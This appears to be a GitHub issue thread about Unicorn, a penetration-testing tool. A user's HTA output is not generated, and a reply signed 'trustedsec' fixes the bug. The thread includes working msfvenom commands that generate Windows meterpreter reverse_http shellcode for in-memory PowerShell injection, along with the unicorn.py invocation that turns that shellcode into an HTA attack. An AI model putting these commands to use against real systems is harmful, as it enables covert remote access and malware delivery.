trustedsec
commented
5 years ago Hey there! There's a few issues with the above command, first you will want to generate 32-bit shellcode only, even on a 64-bit platform. That is due to how Unicorn injects shellcode directly into memory and downgrades the process by using the SYSWOW64 powershell process for memory injection.
So you first command should be:
msfvenom -p windows/meterpreter/reverse_http LHOST=0.0.0.0 LPORT=444 DisbalePayloadHandler=True PrependMigrate=True -f c -a x86 --platform windows -b "\x00" -o ~/shellcode.txt
Next, the shellcode piece within Unicorn - unicorn wouldn't parse the direct export from it being formatted as -c traditionally, because it is looking for something like 0x00,0x01,0x02 however there were already portions of the code where I was parsing msfvenom via the -f c type, so I added this as a function and reused the code so that it could parse it.
There appears to be a bug where it wasn't properly using the tag hta or macro, I fixed this in the latest release and should work as intended.
Thanks for the report! New release 3.6.1 is out now.
Hello there,
I have generated custom shellcode with this command:
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=0.0.0.0 LPORT=444 DisbalePayloadHandler=True PrependMigrate=True -f c -a x64 --platform windows -b "\x00" -o ~/shellcode.txtUsing this command:
python unicorn.py ~/Downloads/working/shellcode.txt shellcode htajust produces a powershell_attack.txt file.I am expecting this command to output these three files:
/opt/unicorn/hta_attack(master*) » ls index.html Launcher.hta unicorn.rc